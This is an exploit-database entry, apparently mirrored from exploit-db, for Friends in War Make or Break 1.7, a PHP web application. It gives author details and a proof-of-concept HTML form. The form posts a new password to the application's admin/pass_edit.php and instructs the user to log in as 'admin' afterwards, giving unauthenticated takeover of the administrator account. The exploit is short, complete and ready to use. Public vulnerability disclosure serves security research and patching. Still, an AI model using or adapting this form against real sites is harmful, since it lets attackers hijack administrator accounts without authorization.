[] NeoSense
E X P L O I T S
title author type platform port cve id

Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)

Author: shinnai
type: webapps
platform: php
port: 
date_added: 2017-07-27 
date_updated: 2017-07-27 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comMake or Break 1.7.zip
Friends in War Make or Break 1.7 - Unauthenticated admin password change

Url: http://software.friendsinwar.com/
     http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------

PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
	<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
	<input type="text" name="password" value="ChangeMe">
	<input type="text" name="submit" value="Edit+Password" hidden=true>
	<input type="submit" value="Submit">
</form>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.